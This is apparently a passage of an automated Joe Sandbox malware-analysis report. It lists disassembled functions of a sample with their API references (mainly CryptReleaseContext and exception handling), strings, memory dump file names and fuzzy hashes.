Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

Strings

OS_Rng: , xrefs: 6CEEDA35
operation failed with error , xrefs: 6CEEDA49

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: 37bce19fb5b97a42de16a18cda5fc71c05559c6e2d7a003c7036c0b75c0aadce
Instruction ID: 6abf15dc58a530ed9ecba474d4ca7a3b6b4a679254ed8f3c574519855708025d
Opcode Fuzzy Hash: 37bce19fb5b97a42de16a18cda5fc71c05559c6e2d7a003c7036c0b75c0aadce
Instruction Fuzzy Hash: A2415BB290C3809FD320CF65C841B9BBBF8AB99754F20491EE1D987740EB769508CB67

Function 6CEF1CA0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CEF1E1D

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

__CxxThrowException@8.LIBCMT ref: 6CEF1E32

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: a2698fa9e3ae81c7919806b13f13884eb9467f534dae8b2a0645e38bfb005c42
Instruction ID: ded2724593f2eaf7030fc0e3cb5f5f1aa4d27716eeeceb2c65450574a5f1c379
Opcode Fuzzy Hash: a2698fa9e3ae81c7919806b13f13884eb9467f534dae8b2a0645e38bfb005c42
Instruction Fuzzy Hash: 3532C6B1A016099FDB08CFD8C894AAEB3B5FF99748B34411DE5259B750EB31ED06CB90

Function 6CF00B89 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d48b50c8e278052f5b5c8ee9350587aee06af73d7bef450f14eaa8ed5e3984
Instruction ID: aa2fedb941682aa1906b1ef5eeae6cce7d74a6da034388fd004af66aa9265c3d
Opcode Fuzzy Hash: a3d48b50c8e278052f5b5c8ee9350587aee06af73d7bef450f14eaa8ed5e3984
Instruction Fuzzy Hash: 4B321532E29F414DD7639634C832326B2ADAFA77C8F26D727F816B5D95EB29C1835100

Function 6CEEDEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE94760: __CxxThrowException@8.LIBCMT ref: 6CE947F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6CEEDF7B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: 0ac7088207d25d057b41a6054d2b7ad54d6cfff12e94d0e92f3438894158eced
Instruction ID: a24bd9044efb01cceb2aea2b945a480a26b5233b35c696d37ae43e8df491a0ce
Opcode Fuzzy Hash: 0ac7088207d25d057b41a6054d2b7ad54d6cfff12e94d0e92f3438894158eced
Instruction Fuzzy Hash: 1121AFB5908344ABC240DF15C940B5BBBE8EBDA7A8F150A1DF89583781D771E608CBA3

Function 6CEEDD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CF0F0E6,000000FF,6CEEDF67,00000000,?), ref: 6CEEDDB4

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 87596d5e4e91d8e4bc53b5583d4308f6a199d1fca09e3650fe29c509a92a05ea
Instruction ID: 22b0dc375d1411163a63955b4703916cc2f7f77ee2e2e095982c532fa9c18635
Opcode Fuzzy Hash: 87596d5e4e91d8e4bc53b5583d4308f6a199d1fca09e3650fe29c509a92a05ea
Instruction Fuzzy Hash: 2B1106B1B187406BE760CF18888075273F4E789798F240B2DEC19C3B80E776D90487D1

Function 6CF135E0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF135F5

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 2ce47527dae8d031bcbbbc60a95225569ecdbd73046ae2de8cf88317ffd731d3
Instruction ID: 00b5e14e959ae8dd174e63425e0fbe641ddd9d9a6aa080da84733e6386ad9c5d
Opcode Fuzzy Hash: 2ce47527dae8d031bcbbbc60a95225569ecdbd73046ae2de8cf88317ffd731d3
Instruction Fuzzy Hash: 10D0A7B1B165126BFF60CF64DC15F4636FC5B42354F290420F908D7A80DF61D805CBA4

Function 6CEED7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CEED803

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: df2fa568a3e3761efbf3eb419283562951864c35a68bf242f0ce9b08dd4a48b9
Instruction ID: bd9421336fd61e8b17efccbdae1cefd612007e65437e8d1f6585160b8f5a818f
Opcode Fuzzy Hash: df2fa568a3e3761efbf3eb419283562951864c35a68bf242f0ce9b08dd4a48b9
Instruction Fuzzy Hash: 75D02EB2B0921012E2209A148C02B837BE80F41A8CF36443DF499D3B80C2B4C440C2D8

Function 6CEED7D3 Relevance: 1.5, APIs: 1, Instructions: 7encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CEED7E0

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 8d91e9e4c509804d7a7ef66048b22f6b6477bf6c92670df03963687c786d7b6c
Instruction ID: bf595277231be898f16e5fac7e098ceaa333970591a6ea3ca260cd1a8bb6bb56
Opcode Fuzzy Hash: 8d91e9e4c509804d7a7ef66048b22f6b6477bf6c92670df03963687c786d7b6c
Instruction Fuzzy Hash: 91B012B4F263001BFD2C17134A2A72928244B8128DF21041D3A0360C844756D0004008

Function 6CEE5830 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

@, xrefs: 6CEE5A30

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 25eb5e3d7faff1bbd3f45beb1b8b7acc2ec6ee7f7dd280f28d0e499f75cbeefb
Instruction ID: d00a341d74267c9e99ed1d4d42e23192d9a36932ab1b7ce3b8c69cf33aab681a
Opcode Fuzzy Hash: 25eb5e3d7faff1bbd3f45beb1b8b7acc2ec6ee7f7dd280f28d0e499f75cbeefb
Instruction Fuzzy Hash: E9914A72819B868BE701CF2CC8829AAB7B0FFD9358F249B1DFDD462601EB759544C781

Function 6CF0BFF1 Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

Strings

N@, xrefs: 6CF0C001

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: 1fb489ac0c79ed2a9afb17a90a077e69f7da935f3e2c122e442b97b61f8f58f6
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: 6B619D72A013158FDB18CF48C49469EBBF2FF84714F2AC2AED8195B362C7B19944DB91

Function 02A81308 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

4']q, xrefs: 02A81406

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 5e9c5eebcba3c958bd71a2e93f3052a1cba73626c42745a41018fd60e8ab8daf
Instruction ID: 8f27212df2bbbdae85fbbde9132636ea73b702f45c271ee433d5434b7733e8ea
Opcode Fuzzy Hash: 5e9c5eebcba3c958bd71a2e93f3052a1cba73626c42745a41018fd60e8ab8daf
Instruction Fuzzy Hash: C9713C75A012058FDB08DFAAE95169ABBF2FF84304F14C129D009DB769EB345946CB60

Function 02A81318 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

4']q, xrefs: 02A81406

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: c273fb5a4b4da6eee6cac8d1aa0a823fd4ba3decd59dfcb68542beec2d5807c6
Instruction ID: 413f36cc09fa7c5985ea338c895b8e0e7d72fff5e10bbf114ebe0416299c52ca
Opcode Fuzzy Hash: c273fb5a4b4da6eee6cac8d1aa0a823fd4ba3decd59dfcb68542beec2d5807c6
Instruction Fuzzy Hash: F1614C75A012098FDB08EFAEE95169ABBF2FF84304F14C529D009DB769EB349845CB60

Function 6CEE58D7 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

@, xrefs: 6CEE5A30

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: df97f6c14b8e16d67ce109705cbfea027fb496598c69d6836870a762bf0b8d5a
Instruction ID: 4f379e2a17ef21449ffd1552e9f539d60ca47659e5c1f33c1574b91e36ba8c5a
Opcode Fuzzy Hash: df97f6c14b8e16d67ce109705cbfea027fb496598c69d6836870a762bf0b8d5a
Instruction Fuzzy Hash: 84516172819B868BE311CF2DC8825AAF7B0BFDA348F209B1DFDD462601EB759544C781

Function 6CEE58D5 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

@, xrefs: 6CEE5A30

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b62e4ca70e49f44dbcc385bda22ffb88c1ae3a241d25b5508b8d27957b0e84b
Instruction ID: 09506423af3fdcec6b48195a6121b4880f985134100b801e9a1bdeafd3d47a48
Opcode Fuzzy Hash: 4b62e4ca70e49f44dbcc385bda22ffb88c1ae3a241d25b5508b8d27957b0e84b
Instruction Fuzzy Hash: DB516271819B868BE311CF2DC8815AAF7B0BFDA348F209B1DFDD462601EB759544C781

Function 02A81738 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

2, xrefs: 02A81850

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: b92e7dc04d0585f8b6e8b5c0672d5c1e2bbe68a950251c3b9b94ae4b4369da49
Instruction ID: 16268432d37e1101aadba10da8e02db56c14e83d19f032d06877a87342419e1c
Opcode Fuzzy Hash: b92e7dc04d0585f8b6e8b5c0672d5c1e2bbe68a950251c3b9b94ae4b4369da49
Instruction Fuzzy Hash: A2413071D05A188BEB5CCF6B8D4079AFAF7AFC9301F54C1BA880CAA254EB704946DF11

Function 02A81728 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

2, xrefs: 02A81850

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 1a3f3ff3a46e8de8a106c8c31c1fdd83d5d1ad39f9cb35e08050b467962e73fa
Instruction ID: 1f1d7d3009a4f96a084f6d87c5b72049ae75b12331256dfd65c7bbd5a04739dc
Opcode Fuzzy Hash: 1a3f3ff3a46e8de8a106c8c31c1fdd83d5d1ad39f9cb35e08050b467962e73fa
Instruction Fuzzy Hash: D6414371E01A188BEB5CCF6B9D4079AFAF7AFC9201F54C1BA880CAA255EF700546DF11

Function 6CED3460 Relevance: .7, Instructions: 681COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57defef04cdd397cd2c8daee722437a19485c34a4febab60d24264a227c0bb9
Instruction ID: aa74d366f6ce4f68929a12cab1b95c4886cb057314d35bff452369b36ed46ff4
Opcode Fuzzy Hash: e57defef04cdd397cd2c8daee722437a19485c34a4febab60d24264a227c0bb9
Instruction Fuzzy Hash: 755299716483058FC758CF5EC98054AF7F2BBC8718F18CA7DA599C6B21E374E9468B82

Function 6CED3E50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c477024e71e463717b892515b73390a80f0de7856b5551fe47b4012150965c
Instruction ID: f58f59fd753db1d5a06673b96f9205d3f47784dbc8776f863be213912ecc1d89
Opcode Fuzzy Hash: 79c477024e71e463717b892515b73390a80f0de7856b5551fe47b4012150965c
Instruction Fuzzy Hash: AA223E71A083058FC344CF69C88064AF7E2FFC8318F59892DE598D7715E775EA4A8B92

